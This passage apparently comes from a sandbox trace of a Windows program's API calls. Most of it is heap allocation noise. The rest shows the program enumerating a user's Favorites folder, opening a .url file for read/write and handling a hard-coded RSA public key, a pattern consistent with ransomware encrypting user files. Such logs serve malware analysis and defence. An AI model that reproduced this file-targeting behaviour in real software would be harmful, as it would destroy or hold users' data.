lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.949] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.949] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.950] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.951] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.951] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.952] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.952] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.953] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0237.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.957] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0237.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7caa0 [0237.957] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0237.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409758 [0237.957] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0237.957] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.957] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.957] PathFindFileNameW (pszPath="") returned="" [0237.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.957] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0237.959] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.959] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0237.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0237.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70e008 [0237.959] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0237.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.961] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=133) returned 1 [0237.961] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.964] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.964] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.965] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x85, lpOverlapped=0x0) returned 1 [0237.965] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.966] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.966] lstrlenA (lpString="-----BEGIN PUBLIC 